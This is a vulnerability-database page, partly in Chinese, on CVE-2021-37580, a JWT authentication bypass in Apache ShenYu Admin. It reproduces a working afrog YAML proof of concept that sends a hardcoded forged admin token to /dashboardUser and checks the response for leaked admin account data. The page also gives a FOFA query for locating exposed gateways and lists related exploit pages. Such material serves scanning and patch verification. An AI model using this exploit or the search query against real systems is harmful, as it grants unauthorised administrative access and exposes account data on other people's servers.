CVE-2021-37580: Apache ShenYu Admin JWT authentication bypass

日期: 2025-09-01 | 影响软件: Apache ShenYu | POC: 已公开

漏洞描述

A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0 fofa: title=="ShenYu Gateway"

PoC代码[已公开]

id: CVE-2021-37580

info:
  name: Apache ShenYu Admin JWT authentication bypass
  author: pdteam
  severity: critical
  description: |
    A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0
    fofa: title=="ShenYu Gateway"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37580
    - https://github.com/fengwenhua/CVE-2021-37580
    - http://wiki.peiqi.tech/wiki/webserver/Apache/Apache%20ShenYu%20dashboardUser%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E%20CVE-2021-37580.html

rules:
  r0:
    request:
      method: GET
      path: /dashboardUser
      headers:
        X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk
    expression: response.status == 200 && response.body.bcontains(b'"userName":"admin"') && response.body.bcontains(b'query success') && response.body.bcontains(b'"code":200')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-37580.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2022-23944: Apache ShenYu Admin Unauth Access POC

CVE-2021-37580: Apache ShenYu Admin JWT - Authentication Bypass POC

CVE-2022-23944: Apache ShenYu Admin Unauth Access POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440） 无POC

CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440）无POC